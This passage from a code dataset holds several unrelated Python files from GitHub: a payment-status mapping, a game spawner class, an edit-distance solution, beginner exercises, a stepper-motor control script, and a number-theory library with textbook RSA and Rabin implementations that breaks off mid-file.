'OrgnlEndToEndId': None}),\n 'status_identifier': txn_inf.get({'BOTSID': 'TxInfAndSts',\n 'StsId': None}),\n 'status': transform.ccode('Payment Status', status),\n 'additional_status_code': transform.ccode(\n 'Additional Payment Status', additional_status, safe=True),\n 'additional_status_text': txn_inf.get({'BOTSID': 'TxInfAndSts'},\n {'BOTSID': 'StsRsnInf',\n 'AddtlInf': None})\n })\n","repo_name":"abhishek-ram/watg-bots","sub_path":"usersys/mappings/xml/payment_status_xml2html.py","file_name":"payment_status_xml2html.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33637073493","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/carbon/common/script/entities/Spawners/actionProcSpawner.py\nimport GameWorld\nimport cef\n\nclass ActionProcSpawner(cef.RuntimeSpawner):\n __guid__ = 'cef.ActionProcSpawner'\n\n def __init__(self, entitySceneID, dynamicSpawnID, recipeTypeID, posProp, rotProp):\n position = GameWorld.GetPropertyForCurrentPythonProc(posProp)\n rotation = GameWorld.GetPropertyForCurrentPythonProc(rotProp)\n cef.RuntimeSpawner.__init__(self, entitySceneID, dynamicSpawnID, recipeTypeID, position, 
rotation)","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/carbon/common/script/entities/Spawners/actionProcSpawner.py","file_name":"actionProcSpawner.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"13633370003","text":"class Solution:\n # opt[m][n] is the minimum edit distance required for word1[:m+1] and word2[:n+1]\n # if word1[m] == word2[n]: opt[m][n] = opt[m-1][n-1]\n # else:\n # 1: replace a character opt[m][n] = opt[m-1][n-1] + 1\n # 2: delete a character from word1 opt[m][n] = opt[m-1][n] + 1\n # 3: insert a charcter to word1 opt[m][n] = opt[m][n-1] + 1\n # opt[m][n] = minimum of above 3 cases.\n # Since we add a padding for opt, when we consider the solution at position (m,n)\n # We are checking the char of word1[m-1] and word2[n-1]\n # null h o r s e\n # null 0 1 2 3 4 5\n # r 1 N N N N N\n # o 2 N N N N N\n # s 3 N N N N N\n def minDistance(self, word1: str, word2: str) -> int:\n self.word1=word1\n self.word2=word2\n self.opt=[[None]*(len(word2)+1) for i in range(len(word1)+1)]\n for i in range(len(word2)+1):\n self.opt[0][i] = i\n for i in range(len(word1)+1):\n self.opt[i][0] = i\n return self.helper(len(word1),len(word2))\n\n \n def helper(self,m,n):\n if self.opt[m][n] is not None:\n return self.opt[m][n]\n if self.word1[m-1] == self.word2[n-1]:\n self.opt[m][n]=self.helper(m-1,n-1)\n else:\n self.opt[m][n]=min(self.helper(m-1,n-1)+1,self.helper(m,n-1)+1,self.helper(m-1,n)+1)\n return self.opt[m][n]\n \n \n ","repo_name":"ruifan831/leetCodeRecord","sub_path":"72_Edit_Distance.py","file_name":"72_Edit_Distance.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5716751029","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/8/10 21:39 下午\n# @Author : HanChen\n# @File : 7_8.py\n# @Software: Sublime Text\n\n# ------------------ example01 ------------------\n\"\"\"\n7-8 熟食店:创建一个名为 sandwich_orders 的列表,在其中包含各种三明治的名字;再创建一个名为 finished_sandwiches 的空列表。\n 遍历列表 sandwich_orders,对于其中的每种三明治,都打印一条消息,如 I made your tuna sandwich,并将其移到列表finished_sandwiches。\n 所有三明治都制作好后,打印一条消息,将这些三明治列出来。\n\"\"\"\nsandwich_orders = ['veggie', 'grilled cheese', 'turkey', 'roast beef']\nfinished_sandwiches = []\n\nwhile sandwich_orders:\n current_sandwich = sandwich_orders.pop()\n print(\"I'm working on your \" + current_sandwich + \" sandwich.\")\n finished_sandwiches.append(current_sandwich)\n\nprint(\"\\n\")\nfor sandwich in finished_sandwiches:\n print(\"I made a \" + sandwich + \" sandwich.\")\n# ------------------ example01 ------------------\n","repo_name":"HanChen1988/PythonStudy","sub_path":"Book/BookNo001/Chapter_07/python_work/7_8.py","file_name":"7_8.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35530260348","text":"#!/usr/bin/python\n\n##--Michael duPont (flyinactor91.com)\n##--Turns a stepper motor based on the current gear setting. 
Higher gear means faster motor\n\nimport RPi.GPIO as GPIO\nimport time\n\nsevenseg = False\n\nif sevenseg:\n\tfrom Adafruit_7Segment import SevenSegment\n\tsegment = SevenSegment(address=0x70)\n\nGPIO.setmode(GPIO.BCM)\n\n#Setup Buttons\nstepUpPin = 25\nstepDownPin = 18\nGPIO.setup(stepUpPin , GPIO.IN)\nGPIO.setup(stepDownPin , GPIO.IN)\n\n#Display Function\ndef setNumber(value):\n\tif value < 0: segment.setColon(True)\n\telse: segment.setColon(False)\n\tsegment.writeDigit(0 , (abs(value) / 1000)%10)\n\tsegment.writeDigit(1 , (abs(value) / 100)%10)\n\tsegment.writeDigit(3 , (abs(value) / 10)%10)\n\tsegment.writeDigit(4 , abs(value) % 10)\n\ndelay = [0,20,17,14,12,10,8,7,6,5,4,3,2] #milliseconds\ngear , count = 0 , 0\nupdate = True\n\n#Main Loop\nwhile True:\n\tif (GPIO.input(stepUpPin) == False) and (GPIO.input(stepDownPin) == True):\n\t\tif gear < 12 and count == 15:\n\t\t\tgear += 1\n\t\t\tcount = 0\n\t\t\tupdate = True\n\telif (GPIO.input(stepDownPin) == False) and (GPIO.input(stepUpPin) == True):\n\t\tif gear > -12 and count == 15:\n\t\t\tgear = gear - 1\n\t\t\tcount = 0\n\t\t\tupdate = True\n\telif (GPIO.input(stepUpPin) == False) and (GPIO.input(stepDownPin) == False):\n\t\tgear , count = 0 , 0\n\t\tupdate = True\n\tif count < 15: count += 1\n\t#print gear\n\tif sevenseg and update:\n\t\tsetNumber(gear)\n\t\tupdate = False\n\tif gear > 0: forward(int(delay[gear]) / 1000.0, 1)\n\telif gear < 0: backwards(int(delay[abs(gear)]) / 1000.0, 1)\n\telse: time.sleep(0.1)\n","repo_name":"flyinactor91/Raspi-Hardware","sub_path":"Motors/StepSpeed.py","file_name":"StepSpeed.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43053800299","text":"import sys\r\nimport json\r\n\r\ndef main():\r\n path = sys.argv[1]\r\n with open(path, \"r\", encoding=\"utf-8\") as fp:\r\n color_dict = json.load(fp)\r\n new_dict_arr = []\r\n for i, key in enumerate(color_dict):\r\n new_elem = {\r\n \"name\": key,\r\n \"color\": color_dict[key],\r\n \"sort_val\": i,\r\n \"is_active\": True\r\n }\r\n new_dict_arr.append(new_elem)\r\n with open(sys.argv[2], 'w', encoding=\"utf-8\") as fp:\r\n json.dump(new_dict_arr, fp, ensure_ascii=False, indent=4)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"R-Imai/dailyProgress-calculation","sub_path":"tools/color_config_update.py","file_name":"color_config_update.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8715315456","text":"# 1. Set the variable `given_name` to the string \"Addison\".\ngiven_name = \"Addison\"\n\n# ------------------------------------------------------------------------------\n# 2. You have 20 candies that you must divide equally among 6 people. How many candies will be left over?\n# Set variables for `candies`, `people`, `left_over` to make your tests pass.\ncandies = 20\npeople = 6\nleft_over = candies % people\n\n# ------------------------------------------------------------------------------\n# 3. Create a function called `greeting` that returns \"Hello, !\",\n# where is the name given as an argument to the function.\ndef greeting(name):\n return f\"Hello, {name}!\"\n\n\n# ------------------------------------------------------------------------------\n# 4. Create a function called `is_odd` that, given a number, will\n# return true if the number is odd and false if it is not. 
An odd number is a\n# number which, when divided by 2, has a remainder of 1 or -1.\n\n# USING TRY/EXCEPT (I'm still trying to wrap my head around\n# try/except, even after getting this to work!):\ndef is_odd(number):\n output = False\n try:\n output = number % 2 == 1 or number % 2 == -1\n except TypeError:\n print(\"Does not compute\")\n return output\n\n# USING IF/ELSE:\n# def is_odd(number):\n# if number % 2 == 1 or number % 2 == -1:\n# return True\n# else:\n# return False\n\n# ------------------------------------------------------------------------------\n# 5. Create a function called `is_even` that, given a number, will\n# return true if the number is even and false if it is not. An even number is a\n# number which, when divided by 2, has a remainder of 0.\ndef is_even(number):\n #USING IS_ODD\n # return bool((not is_odd(number)) and (type(number) is int) and (number is not 0))\n\n # USING IF/ELSE:\n if number % 2 == 0:\n return True\n else:\n return False\n\n\n\n# ------------------------------------------------------------------------------\n# 6. Create a function called `fahrenheit_to_celsius` that takes a\n# Fahrenheit temperature as an argument and returns the\n# temperature in Celsius.\ndef fahrenheit_to_celsius(fahrenheit):\n celsius = (fahrenheit - 32) * 0.5556\n return int(celsius)\n\n# ------------------------------------------------------------------------------\n# 7. Create a function called `celsius_to_fahrenheit` that takes a\n# Celsius temperature as an argument and returns the\n# temperature in Fahrenheit.\ndef celsius_to_fahrenheit(celsius):\n fahrenheit = (celsius*1.8000) + 32\n return fahrenheit\n\n\n# ------------------------------------------------------------------------------\n# 8. Create a function called `fahrenheit_to_kelvin` that takes a\n# Fahrenheit temperature as an argument and returns the\n# temperature in Kelvin. This function must use your previous\n# fahrenheit_to_celsius function.\n# Absolute zero (0 K) is equivalent to −273.15 C.\n# 1 degree Kelvin equals 1 degree Celsius.\ndef fahrenheit_to_kelvin(fahrenheit):\n kelvin = fahrenheit_to_celsius(fahrenheit) + 273.15\n return kelvin\n\n# ------------------------------------------------------------------------------\n# 9. Create a function called `lesser` that takes two numbers as\n# arguments and returns the lesser of them. This function should\n# use an if/else statement.\ndef lesser(num1, num2):\n if num1 < num2:\n return num1\n elif num1 > num2:\n return num2\n else:\n return \"num1 and num2 are equal.\"\n\n\n# ------------------------------------------------------------------------------\n# 10. Create a function called `multigreeting` that takes a name\n# and a language code and returns a version of \"Hello, !\"\n# in the specified language. 
The supported languages and their\n# translations are below.\n#\n# en - Hello, !\n# es - ¡Hola, !\n# fr - Bonjour, !\n# eo - Saluton, !\n#\n# If any other language code is used, return nothing.\ndef multigreeting(name, language):\n # DICTIONARY\n try:\n multilanguage_greeting_dict = {\n \"en\": f\"Hello, {name}!\",\n \"es\": f\"¡Hola, {name}!\",\n \"fr\": f\"Bonjour, {name}!\",\n \"eo\": f\"Saluton, {name}!\"\n }\n return multilanguage_greeting_dict[language]\n except:\n return\n \n #NO DICTIONARY\n # if language == \"en\":\n # return \"Hello, \" + name + \"!\"\n # elif language == \"es\":\n # return \"¡Hola, \" + name + \"!\"\n # elif language == \"fr\":\n # return \"Bonjour, \" + name + \"!\"\n # elif language == \"eo\":\n # return \"Saluton, \" + name + \"!\"\n # else:\n # return\n\n# ------------------------------------------------------------------------------\n# 11. The greatest common divisor (https://en.wikipedia.org/wiki/Greatest_common_divisor)\n# is the largest integer that, given two other integers, can be divided into them. For\n# example, the greatest common divisor of 24 and 81 is 3. The greatest common divisor of\n# 10 and 25 is 5.\n#\n# One method of calculating the greatest common divisor is the \"binary GCD algorithm.\"\n# (https://en.wikipedia.org/wiki/Greatest_common_divisor#Binary_GCD_algorithm)\n# It can be written out like the following:\n#\n# Input: a, b positive integers\n# Output: The greatest common divisor, which is g * 2**d\n# d = 0\n# while a and b are both even\n# a = a/2\n# b = b/2\n# d = d + 1\n# while a != b\n# if a is even then a = a/2\n# else if b is even then b = b/2\n# else if a > b then a = (a – b)/2\n# else b = (b – a)/2\n# g = a\n# output g * 2**d\n\n\n# Write a function called `gcd` that takes two arguments and returns the greatest\n# common divisor using the instructions above.\ndef gcd(a, b):\n # TRYING TERNARY OPERATORS--THIS DIDN'T WORK\n # d = 0\n # while is_even(a) and is_even(b):\n # a = a / 2\n # b = b / 2\n # d = d + 1\n # while a != b:\n # a = a / 2 if is_even(a) else b = b / 2 if is_even(b) else a = (a - b) / 2 if a > b else b = (b - a) / 2\n # ALTERNATELY===\n # a = a / 2 if is_even(a) else (a - b) / 2\n # b = b / 2 if is_even(b) else (b - a) / 2\n # ===\n # g = a\n # return g * 2**d\n\n # TRYING A TUPLE WITH TERNARY OPERATORS\n counter = 0\n while is_even(a) and is_even(b):\n a = a / 2\n b = b / 2\n counter += 1\n ab_tuple = (a, b)\n while a != b:\n while is_even(a) or is_even(b):\n ab_tuple = (a/2, b/2) if is_even(a) and is_even(b) else (a/2, b) if is_even(a) \\\n and not is_even(b) else (a, b/2) if not is_even(a) and is_even(b) else (a, b)\n a = ab_tuple[0]\n b = ab_tuple[1]\n ab_tuple = ((a-b)/2, b) if a > b else (a, (b-a)/2)\n a = ab_tuple[0]\n b = ab_tuple[1]\n return a * 2**counter\n\n # ORIGINAL\n # counter = 0\n # while is_even(a) and is_even(b):\n # a = a / 2\n # b = b / 2\n # counter += 1\n # while a != b:\n # if is_even(a):\n # a = a / 2\n # elif is_even(b):\n # b = b / 2\n # elif a > b:\n # a = (a - b) / 2\n # else:\n # b = (b - a) / 2\n # g = a\n # return g * 2**counter\n","repo_name":"Momentum-PT-Team-3/python-problem-set-1-arieljsmith","sub_path":"problem_set_1.py","file_name":"problem_set_1.py","file_ext":"py","file_size_in_byte":7125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28627058785","text":"import random \nfrom collections import Counter\nimport time\nimport math\nfrom functools import wraps\nimport json\n# 
=====================================================================================\n# 注释掉两条分割线之间的东西来使用\n\n\n# import numpy as np \n# import torch\n# from torch import nn\n# import pandas as pd\n# import click\n# # import time\n# # from functools import wraps\n\n\n# # 当我对func函数装饰的时候,自然需要传入func作为实参\n# # @add_time 等价于 add_time(func),因此我有一个新的函数g接住add_time的返回值,这里假设返回的函数是wrap_func\n# # 当我执行g的时候,实际上执行的是wrap_func,而执行wrap_func实际上主体在执行func,因此wrap_func的参数需要传func的参数\n# def add_time(func):\n# # 这个wraps是固定写法,为了函数文档和函数名字的不变\n# @wraps(func)\n# def wrap_func(*args,**kwds):\n# s = time.time()\n# # 这是我的函数的主体部分,我希望在前后加上一些东西\n# ans = func(*args,**kwds)\n# e = time.time()\n# print(f'Time for {func.__name__} is {e - s}s')\n# return ans\n# return wrap_func\n\n\n\n# class BatchNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(0,2,3),keepdim=True)) / X.std(dim=(0,2,3),keepdim=True)\n\n# class LayerNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(1,2,3),keepdim=True)) / X.std(dim=(1,2,3),keepdim=True)\n\n# class InstanceNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(2,3),keepdim=True)) / X.std(dim=(2,3),keepdim=True)\n\n\n# def shape_conv(h,h_k,stride,padding):\n# return int((h - h_k + stride + 2 * padding) / stride)\n\n# def shape_trans_conv(h,h_k,stride,padding,out_padding=0):\n# \"\"\"\n# H_out = (H_in - 1)*stride - 2*padding + kernel_size + out_padding\n# If we choose stride = 2,kernel_size = 2 and both padding are 0\n# Then the H and W are doubled\n# \"\"\"\n# return int(\n# (h - 1) * stride - 2 * padding + h_k + out_padding\n# )\n\n\n# def draw_table(m,mode):\n# \"\"\"\n# mode = 'add' or 'mul'\n# \"\"\"\n\n# sheet = np.zeros((m,m))\n# if mode == 'add':\n# for i in range(m):\n# for j in range(m):\n# sheet[i,j] = (i + j) % m\n# else:\n# for i in range(m):\n# for j in range(m):\n# sheet[i,j] = (i * j) % m\n\n# ans = pd.DataFrame(sheet)\n# ans.to_excel(f'm={m}_mode={mode}.xlsx')\n\n# class PixelNorm(nn.Module):\n# def __init__(self):\n# super(PixelNorm,self).__init__()\n \n# def forward(self,X):\n# tmp = X * X\n# return X / torch.sqrt(tmp.sum(dim=1,keepdim=True))\n\n# class Maxout(nn.Module):\n# def __init__(self,num_in,num_out,pieces):\n# super(Maxout,self).__init__()\n# self.W = nn.Parameter(torch.randn(num_in,num_out,pieces))\n# self.b = nn.Parameter(torch.randn(num_out,pieces))\n# def forward(self,X):\n# return torch.from_numpy(np.max(np.tensordot(X.detach().numpy(),self.W.detach().numpy(),axes=1) + self.b.detach().numpy(),axis=2))\n\n\n\n\n# =====================================================================================\n\n\n\ndef add_time(func):\n # 这个wraps是固定写法,为了函数文档和函数名字的不变\n @wraps(func)\n def wrap_func(*args,**kwds):\n s = time.time()\n # 这是我的函数的主体部分,我希望在前后加上一些东西\n ans = func(*args,**kwds)\n e = time.time()\n print(f'Time for {func.__name__} is {e - s}s')\n return ans\n return wrap_func\n\n\ndef __lcm(a:int,b:int) -> int:\n return a*b//gcd(a,b)\n\ndef lcm(*a):\n '''lcm(3,4,5,6,7)'''\n assert len(a) > 1,f'The number of input of function lcm must be bigger than 1'\n ans = __lcm(a[0],a[1])\n for item in a[2:]:\n ans = __lcm(ans,item)\n return ans\n pass\n\n\n\ndef __gcd(a,b):\n a = abs(a)\n b = abs(b)\n if a == 0:\n return b\n if b == 0:\n return a\n\n while a!=0 and b!=0:\n a,b = b,a%b\n\n 
if b == 0:\n return a\n if a == 0:\n return b\n \n\n\ndef gcd(*a):\n '''\n 求多个整数的最大公因数\n gcd(12,32,45,64)\n '''\n # for item in a:\n # if item == 1:\n # return 1\n # if len(a) == 2:\n # return __gcd(a[0],a[1])\n # else:\n # d = __gcd(a[0],a[1])\n # for i in range(2,len(a)):\n # d = __gcd(d,a[i])\n # if d == 1:\n # return d\n # return d\n l = len(a)\n assert l>1,f'The length of list should be bigger than 1'\n gcd = 1\n for i in range(l-1):\n x = abs(a[i])\n y = abs(a[i+1])\n while x!=0 and y!=0:\n x,y = y,x%y\n if x == 0:\n gcd = y\n else:\n gcd = x\n if gcd == 1:\n return gcd\n return gcd\n\n\ndef is_prime (n):\n n = int(n)\n if n == 1:\n return False\n\n if n > 1e6:\n return is_large_prime(int(n))\n upper = int(n ** 0.5)\n upper += 1\n for i in range(2,upper):\n if n % i == 0 :\n return False\n return True\n\n\ndef get_prime (N):\n '''获取前小于等于N的所有素数'''\n a = [True] * (N + 1)\n indices = list(range(2,N + 1))\n for index in indices:\n if not a[index]:\n pass \n else :\n i = 2\n while index * i <= N :\n a[i * index] = False \n i += 1\n ans = list(filter(lambda x:a[x],indices))\n return ans\n\n\ndef bezout(a,b):\n '''计算贝祖等式'''\n s2 = 0\n s1 = 1\n t2 = 1\n t1 = 0\n q = int(a / b)\n r2 = a % b\n r1 = b\n\n while r2 != 0:\n s2,s1 = -q * s2 + s1 , s2\n t2,t1 = -q * t2 + t1 , t2\n q = int(r1 / r2)\n r2,r1 = -q * r2 + r1 , r2\n return (s2,t2)\n\n\n\n\n# @add_time\ndef get_inverse(a,m):\n '''求解a模m的逆元'''\n tmp = bezout(a,m)[0]\n while tmp <= 0:\n tmp += m\n return tmp\n\n\ndef china_res(b:list,m:list):\n '''\n the first element of returned tuple is the ANS\\n\n the second element of returned tuple is the product of M_i\\n\n '''\n M = 1\n for item in m:\n M *= item\n \n ans = 0\n \n for i in range(len(m)):\n m_i = m[i]\n M_i = int(M / m_i)\n M_i_inverse = get_inverse(M_i,m_i)\n ans += int(b[i] * M_i * M_i_inverse)\n \n # ans %= M\n ans = ans % M\n # print(ans)\n # print(M)\n return (ans,M)\n\ndef ten2two(n:int,total_bits:int=8):\n '''n should be positive'''\n sign = (n >= 0)\n n = abs(n)\n tmps = []\n while n != 0:\n tmps.append(int(n&1))\n n >>= 1\n tmps.append(0)\n if not sign:\n for i in range(len(tmps)):\n tmps[i] = 1 if tmps[i] == 0 else 0\n tmps[0] += 1\n for i in range(len(tmps)):\n if tmps[i] == 2:\n tmps[i] = 0\n if i < len(tmps) - 1:\n tmps[i + 1] += 1\n else:\n tmps.append(1)\n tmps = tmps[::-1]\n tmps = ''.join(str(item) for item in tmps)\n tmps = tmps[0] + tmps[0]*(total_bits - len(tmps)) + tmps[1:] if total_bits >= len(tmps) else tmps[len(tmps) - total_bits:]\n return tmps\n\n\ndef euler_function(n:int):\n '''求n的欧拉函数phi(n)'''\n N = n\n primes = get_prime(n)\n p_set = []\n for p in primes:\n while n % p == 0:\n n /= p\n p_set.append(p)\n p_set = set(p_set)\n ans = N\n for p in p_set:\n ans *= (1 - 1/p)\n return int(ans)\n\n\ndef solve_foce(a:int,b:int,m:int):\n '''\n solve_first_order_congruence_equation\n return value is a tuple\n the first element of tuple is constant\n the second element of tuple is the coefficient of t\n '''\n gcd_a_m = gcd(a,m)\n a1 = get_inverse(int(a/gcd_a_m), int(m/gcd_a_m))\n a2 = b / gcd_a_m * a1\n a2 = int(a2)\n return (a2,int(m/gcd_a_m))\n\n\n\n# @add_time\ndef fast_power(base:int,power:int,m:int) -> int:\n '''\n return base^power mod m\n '''\n ans = 1\n while power != 0:\n if power & 1:\n ans = ans * base % m\n base = base * base % m\n power >>= 1\n return ans \n\ndef get_all_factors(n:int):\n '''获取n所有的因数'''\n s = set()\n for i in range(1,int(math.sqrt(n) + 1)+1):\n if n % i == 0:\n s.add(i)\n s.add(n // i)\n return s\n\n\ndef factor(n:int):\n '''\n 
factor(n)\n 对n进行素因数分解\n 算数基本定理进行分解\n '''\n l = []\n target = int(math.sqrt(n)) + 1\n for i in range(2,target+1):\n while n % i == 0:\n n = n // i\n l.append(i)\n if n != 1:\n l.append(n)\n return dict(Counter(l))\n\ndef euler_judge(a:int,p:int):\n '''判断a是不是模p的平方剩余'''\n ans = fast_power(a,(p-1)//2,p)\n return ans if ans==1 else ans - p\n\ndef legendre(a:int,p:int):\n '''计算勒让德符号(a/p)'''\n if a % p == 0:\n return 0\n return euler_judge(a,p)\n\ndef theorem_4_3_4(a,p):\n if a == 2:\n return (-1) ** ((p**2-1)/8)\n elif gcd(a,2*p) == 1:\n tmp = 0\n for k in range(1,(p-1)//2 + 1):\n tmp += int(a*k/p)\n return (-1) ** tmp\n else:\n print(f'gcd(a,2p) != 1')\n\n\ndef m2m(m,e,b):\n '''\n return m^e % b\n '''\n result=1\n m1=m\n while(e>=1):\n e1=e%2\n if(e1==1):\n result=(m1*result)%b\n m1=(m1**2)%b\n e=e//2\n return int(result)\n\n# class RSA():\n# @staticmethod\n# def hello_static():\n# print(f'This is {RSA.__name__} static method!')\n\n# @classmethod\n# def hello_class(cls):\n# print(f'This is {RSA.__name__} class method!')\n\n# def __init__(self,p=19260817,q=19260817):\n# self.p = p\n# self.q = q\n# self.n = p * q\n# self.phi = (self.p -1) * (self.q -1)\n# self.e = random.randint(2,self.phi)\n# while gcd(self.e,self.phi) != 1:\n# self.e = random.randint(2,self.phi)\n# self.d = get_inverse(self.e,self.phi)\n# self.char_to_index = {}\n# self.index_to_char = {}\n# self.set_char()\n \n# def __func(self,num):\n# if num < 10:\n# return '0' + str(num)\n# else :\n# return str(num)\n \n# def set_char(self,char_set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz' + ' ,.?!' + '0123456789'):\n \n \n# self.char_set = char_set\n# indices = [self.__func(i) for i in range(len(self.char_set))]\n# self.char_to_index = {k:v for k,v in zip(self.char_set,indices)}\n# self.index_to_char = {k:v for v,k in self.char_to_index.items()}\n\n\n# def digitalize(self,m):\n# if not isinstance(m,str):\n# m = str(m)\n# ans = []\n# for item in m:\n# ans.append(self.char_to_index.get(item))\n# return ''.join(ans)\n \n# def dedigitalize(self,c):\n# if not isinstance(c,str):\n# c = str(c)\n# ans = []\n# for i in range(0,len(c),2):\n# ans.append(self.index_to_char.get(c[i] + c[i+1]))\n# return ''.join(ans)\n \n# def lock(self,m):\n# if not isinstance(m,int):\n# m = int(m)\n# c = m2m(m,self.e,self.n)\n# return c\n\n# def unlock(self,c):\n# if not isinstance(c,int):\n# c = int(c)\n# m = m2m(c,self.d,self.n)\n# return m\n \ndef two2ten(n:str)->int:\n n = list(n)[::-1]\n ans = 0\n for index in range(len(n)):\n ans += int(n[index]) * 2**index\n return ans\n\n\ndef func(n:str):\n k,n = n.split('.')\n base = 10 ** (len(n))\n n = int(n)\n count = 0\n ans = []\n for i in range(40):\n n *= 2\n ans.append(int(n // base))\n count += 1\n if count == 4:\n ans.append(' ')\n count = 0\n n = n % base\n if n == 0:\n break\n weishu = ''.join(str(item) for item in ans)\n\n return k + '.' 
+ weishu\n\ndef jianfa(a:str,b:str):\n '''二进制减法 a需要比b大'''\n A = [0] * len(a)\n B = [0] * len(b)\n for i in range(len(a)):\n A[i] = int(a[i])\n for i in range(len(b)):\n B[i] = int(b[i])\n a = A\n b = B\n a = a[::-1]\n b = b[::-1]\n for index in range(len(b)):\n a[index] -= b[index]\n for index in range(len(a)):\n while a[index] < 0:\n a[index] += 2\n a[index + 1] -= 1\n a = a[::-1]\n return ''.join(str(item) for item in a)\n\ndef get_quadratic_residue(m:int):\n '''获取模m的二次剩余'''\n ans = set()\n for x in range(m):\n a = x**2 % m\n if gcd(a, m) == 1:\n ans.add(a)\n return ans\n\ndef theorem_4_6_3(a:int,p:int):\n '''课本149页的定理4.6.3'''\n assert p%2==1 and is_prime(p),f'p={p} is not an odd prime number!'\n \n t = int(factor(p-1).get(2,0))\n s = (p-1) // 2**t\n a_inverse = get_inverse(a,p)\n\n while True:\n n = random.randint(1,p)\n if gcd(n,p) == 1 and legendre(n,p) != 1:\n break\n b = fast_power(n,s,p)\n ans = [0] * t\n ans[-1] = fast_power(a,(s+1)//2,p)\n for index in range(t-2,-1,-1):\n flag = fast_power((a_inverse * ans[index + 1]**2),2**(index),p)\n if flag % p == 1:\n j = 0\n else:\n j = 1\n ans[index] = (ans[index + 1] * b**(j * 2**(t - index - 2))) % p\n return ans[0]\n\ndef theorem_4_6_2(a:int,p:int,q:int):\n '''solve this : x^2 mod p*q = a'''\n assert is_prime(p) and (p+1) % 4 == 0,f'You cannot use theorem_4_6_2 because p={p} is not prime like 4k+3'\n assert is_prime(q) and (q+1) % 4 == 0,f'You cannot use theorem_4_6_2 because q={q} is not prime like 4k+3'\n assert legendre(a,p)==1, f'You cannot use theorem_4_6_2 because p={p} does not satisfiy legendre'\n assert legendre(a,q)==1, f'You cannot use theorem_4_6_2 because q={q} does not satisfiy legendre'\n\n s,t = bezout(q,p)\n s,t = s*q,t*p\n s1 = fast_power(a,(p+1)//4,p)\n t1 = fast_power(a,(q+1)//4,q)\n ans = [0] * 4\n ans[0] = s1*s + t1*t\n ans[1] = -s1*s + t1*t\n ans[2] = s1*s - t1*t\n ans[3] = -s1*s - t1*t\n for index in range(len(ans)):\n ans[index] %= (p*q)\n return tuple(ans)\n\n\n# @click.command()\n# @click.option('--a',type=int)\n# @click.option('--m',type=int)\ndef enumerate_quadratic(a,m):\n '''暴力求解x^2 mod m == a'''\n ans = []\n for x in range(m):\n if x**2 % m == a:\n ans.append(x)\n print(ans)\n return tuple(ans)\n\nclass Rabin():\n def __init__(self,p=19260803,q=19260767):\n self.p = p\n self.q = q\n self.n = self.p * self.q \n self.charset = ' ,.?!' 
+ '0123456789' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz'\n self.char_to_index = {\n char:index + 12345678 for index,char in enumerate(self.charset)\n }\n self.index_to_char = {\n index:char for char,index in self.char_to_index.items()\n }\n self.group_len = 16\n def lock(self,m):\n cypertext = ''\n m = str(m)\n for char in m:\n index = self.char_to_index[char]\n c = str(fast_power(index,2,self.n))\n c = '0'*(self.group_len - len(c)) + c\n cypertext += c\n return cypertext\n\n def unlock(self,c):\n c = str(c)\n m = ''\n for index in range(0,len(c),self.group_len):\n c_single = int(c[index:index+self.group_len])\n c_num = theorem_4_6_2(c_single,self.p,self.q)\n for num in c_num:\n if num < 1e9:\n m += self.index_to_char[num]\n break\n\n return m\n\n\ndef theorem_4_7_1(p:int):\n '''\n 课本P159定理4.7.1\n 求解x^2 + y^2 = p\n p = 2 or p = 4k + 1\n '''\n assert p==2 or p%4==1 ,'p != 2 or p is not like 4k + 1'\n x = theorem_4_6_3(-1,p)\n y = 1\n m = (x**2 + y**2)//p\n while m != 1:\n u = x % m \n v = y % m\n x,y = (u*x + v*y)//m , (u*y - v*x)//m\n m = (x**2 + y**2) //p\n return x,y\n\ndef get_exp(a,m):\n '''获得a模m的指数e'''\n assert gcd(a,m) == 1,f'gcd({a},{m})不是1,不满足指数的条件!'\n i = 1\n while fast_power(a,i,m) != 1:\n i += 1\n return i\n\ndef is_primitive_root(a:int,m:int):\n '''判断a是不是模m原根'''\n assert gcd(a,m) == 1,f'a = {a} , m = {m} 并不互素,不满足原根或指数的判断条件!'\n flag = True\n phi = euler_function(m)\n e = get_exp(a,m)\n return e == phi\n pass\n\n\ndef get_prime_factors(n):\n '''获取n所有的素因子'''\n l = list(factor(n).keys())\n return l\n\n\ndef get_primitive_root(n):\n '''求n的原根'''\n # assert is_prime(n) and n != 2,f'{n} is not odd prime number!'\n if is_prime(n) and n != 2:\n l = get_prime_factors(n-1)\n l = list(map(lambda x:(n-1)//x,l))\n ans = []\n for g in range(2,n):\n if gcd(g,n) != 1:\n continue\n flag =True\n for index in l:\n if fast_power(g,index,n) == 1:\n flag = False\n break\n if flag:\n ans.append(g)\n return ans\n else:\n print(f'm = {n} is not odd prime number, so using enumerate to get all primitive roots of m = {n}')\n ans = []\n for i in range(1,n):\n try:\n if is_primitive_root(i,n):\n 